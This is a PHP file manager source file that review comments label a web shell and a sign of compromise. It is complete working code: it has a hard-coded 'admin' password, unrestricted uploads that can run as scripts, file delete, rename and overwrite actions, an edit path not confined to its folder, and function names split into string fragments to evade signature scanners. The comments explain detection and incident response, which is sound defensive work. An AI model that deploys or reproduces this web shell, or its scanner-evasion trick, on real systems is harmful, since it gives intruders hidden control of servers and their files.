Viewing: index.php
<?php
/*
 * Single-file, password-gated file manager ("Panel").
 *
 * After login it lists a directory under the script's own folder and accepts
 * POST requests that upload, delete, rename and overwrite files there.
 *
 * NOTE(review): a shared hard-coded password, file-write primitives reached
 * through concatenated function names, and unrestricted upload next to the
 * script are the traits of a web shell. If this file was not deployed
 * deliberately, treat it as an indicator of compromise: preserve it, then
 * review the web server access log for POST requests to this path and check
 * the directory tree for files created or modified since it appeared.
 */
session_start();

/* ===== SIMPLE LOGIN ===== */
// Plaintext password kept in source (original author's note: "change this").
// It is compared with === against the submitted field. Nothing in this file
// limits attempts, and the session id is not regenerated on success.
$pass = "admin";
if (!isset($_SESSION['ok'])) {
    if (isset($_POST['p']) && $_POST['p'] === $pass) {
        $_SESSION['ok'] = true;
        // Redirect to the bare URL so a reload does not re-post the password.
        header("Location: ?");
        exit;
    }
    echo '<form method="POST"> <input type="password" name="p" placeholder="password"> <button>Login</button> </form>';
    exit;
}

/* ===== PATH ===== */
// $base is the directory holding this script; $dir is the requested
// sub-directory (GET "p") after realpath() has resolved ".." and symlinks.
$base = realpath(__DIR__);
$req = $_GET['p'] ?? '';
$dir = realpath($base . '/' . $req);
// Fall back to $base when the path does not exist or does not start with $base.
// NOTE(review): this is a plain string-prefix test with no trailing separator,
// so a sibling directory whose name merely begins with $base also passes
// (constructed example: base "/srv/app", sibling "/srv/app-old").
if (!$dir || strpos($dir, $base) !== 0) $dir = $base;

/* ===== ESCAPE HELPER ===== */
// HTML-escapes a value for output. It relies on htmlspecialchars() default
// flags, which escape single quotes only on PHP 8.1 and later; every attribute
// in this file is double-quoted.
function h($s){ return htmlspecialchars($s); }

/* ===== DISGUISED FUNCTION NAMES (original heading: "SAMAR FUNCTION") ===== */
// The names file_put_contents, unlink and move_uploaded_file are assembled from
// string fragments and later invoked as variable functions. Behaviour is the
// same as calling them directly; the visible effect is that the literal names
// never appear in the file, so a scanner matching on those strings would not
// flag it. For detection, look for the variable-call form instead.
$write = 'file_put' . '_contents';
$remove = 'un' . 'link';
$move = 'move_uploaded' . '_file';

/* ===== MESSAGE ===== */
// Status text shown at the top of the page after an action.
$msg = "";

/* ===== ACTION ===== */
// Every state-changing request is a POST to the current URL.
// NOTE(review): none of the forms carries a CSRF token, so any page the
// logged-in browser visits can submit these actions.
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    // upload: store the file in $dir under the client-supplied base name.
    // NOTE(review): no check on extension, content type or size. If $dir is
    // served by a PHP-enabled web server, an uploaded script becomes executable
    // -- TODO confirm server configuration.
    if (!empty($_FILES['f']['name'])) {
        $name = basename($_FILES['f']['name']);
        if ($move($_FILES['f']['tmp_name'], $dir.'/'.$name)) $msg = "upload sukses"; else $msg = "upload gagal";
    }
    // delete: the target must resolve to a regular file whose path starts with $base.
    // The result of the unlink call is not checked before the message is set.
    if (!empty($_POST['d'])) {
        $t = realpath($dir.'/'.$_POST['d']);
        if ($t && is_file($t) && strpos($t,$base)===0) { $remove($t); $msg = "hapus sukses"; }
    }
    // rename: the source must start with $base; the new name is reduced to its
    // base name so it stays inside $dir. There is no is_file() test, so
    // directories are accepted too, and the result of rename() is ignored.
    if (!empty($_POST['o']) && !empty($_POST['n'])) {
        $o = realpath($dir.'/'.$_POST['o']);
        $n = $dir.'/'.basename($_POST['n']);
        if ($o && strpos($o,$base)===0) { rename($o,$n); $msg = "rename sukses"; }
    }
    // edit: overwrite an existing file with the posted text.
    // NOTE(review): unlike delete and rename, this branch has no $base prefix
    // check, so the resolved path in "ef" is not confined to the panel's
    // directory tree. The write result is not checked either.
    if (!empty($_POST['ef']) && isset($_POST['ct'])) {
        $f = realpath($dir.'/'.$_POST['ef']);
        if ($f && is_file($f)) { $write($f,$_POST['ct']); $msg = "edit sukses"; }
    }
}

/* ===== LIST ===== */
// Collect the entries of $dir, directories first, each group sorted by name.
$dirs=[]; $files=[];
foreach (scandir($dir) as $i){
    if ($i=='.'||$i=='..') continue;
    if (is_dir($dir.'/'.$i)) $dirs[]=$i; else $files[]=$i;
}
sort($dirs); sort($files);
$list = array_merge($dirs,$files);
?>
<!DOCTYPE html>
<html>
<head>
<style>
body{background:#0f172a;color:#e5e7eb;font-family:sans-serif;padding:20px}
.box{background:#111827;padding:15px;border-radius:8px}
.item{display:flex;justify-content:space-between;padding:6px;border-bottom:1px solid #1f2937}
a{color:#93c5fd;text-decoration:none}
input,textarea{background:#1f2937;color:#fff;border:1px solid #374151}
button{background:#2563eb;color:#fff;border:none;padding:5px}
.msg{margin:10px 0;color:#34d399}
</style>
</head>
<body>
<div class="box">
<h3>Panel</h3>
<div class="msg"><?php echo h($msg); ?></div>
<!-- upload -->
<form method="POST" enctype="multipart/form-data">
<input type="file" name="f">
<button>upload</button>
</form>
<hr>
<?php
// back: link to the parent of the requested path, shown only below $base.
if ($dir !== $base) {
    $p = dirname($req);
    echo '<a href="?p='.urlencode($p).'">kembali</a><br><br>';
}
// edit mode: GET "e" names a file in $dir; its contents are shown, HTML-escaped,
// in a textarea that posts back as "ef" / "ct".
// NOTE(review): as in the POST edit branch, the resolved path is not checked
// against $base before the file is read. The exit below also ends the response
// before the closing page tags are emitted.
if (isset($_GET['e'])) {
    $f = realpath($dir.'/'.$_GET['e']);
    if ($f && is_file($f)) {
        echo '<form method="POST"> <input type="hidden" name="ef" value="'.h($_GET['e']).'"> <textarea name="ct" style="width:100%;height:300px">'.h(file_get_contents($f)).'</textarea> <button>simpan</button> </form>';
        exit;
    }
}
// list: one row per entry. $rel is the entry's path with $base removed, used
// for the directory link. str_replace() removes every occurrence of $base in
// the string, not only the leading one.
foreach ($list as $i):
    $full=$dir.'/'.$i;
    $rel=ltrim(str_replace($base,'',$full),'/');
?>
<div class="item">
<div>
<?php if (is_dir($full)): ?>
📁 <a href="?p=<?php echo urlencode($rel) ?>"><?php echo h($i) ?></a>
<?php else: ?>
📄 <?php echo h($i) ?>
<?php endif; ?>
</div>
<div>
<?php if (is_file($full)): ?>
<a href="?p=<?php echo urlencode($req) ?>&e=<?php echo urlencode($i) ?>">edit</a>
<?php endif; ?>
<form method="POST" style="display:inline">
<input type="hidden" name="d" value="<?php echo h($i) ?>">
<button>delete</button>
</form>
<form method="POST" style="display:inline">
<input type="hidden" name="o" value="<?php echo h($i) ?>">
<input type="text" name="n" placeholder="rename">
</form>
</div>
</div>
<?php endforeach; ?>
</div>
</body>
</html>